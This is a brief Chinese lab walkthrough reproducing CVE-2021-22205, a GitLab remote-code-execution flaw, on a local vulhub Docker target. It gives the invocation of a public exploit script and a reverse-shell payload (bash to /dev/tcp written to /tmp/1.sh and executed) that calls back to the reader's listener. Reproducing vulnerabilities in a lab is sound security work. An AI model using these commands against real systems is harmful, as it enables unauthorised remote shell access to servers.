靶场搭建
靶机IP:192.168.1.3
靶场搭建使用的是vulhub使用docker启动靶场
漏洞复现
启动靶场访问:http://192.168.1.3:8080
漏洞复现测试脚本:https://github.com/Al1ex/CVE-2021-22205
使用该脚本进行命令执行
python3 CVE-2021-2205.py -a true -t http://192.168.1.3:8080 -c "[执行的命令]"
执行的命令:
echo 'bash -i >& /dev/tcp/[ip]/[port] 0>&1' > /tmp/1.sh #将反弹shell的命令写入1.sh执行脚本中,ip和port写成你自己nc监听的ip和port
chmod +x /tmp/1.sh #赋予1.sh可执行权限
/bin/bash /tmp/1.sh #执行1.sh脚本
通过/bin/bash执行/tmp/1.sh,来执行其中的反弹命令。
相关连接
https://github.com/Al1ex/CVE-2021-22205
https://github.com/vulhub/vulhub/tree/master/gitlab/CVE-2021-22205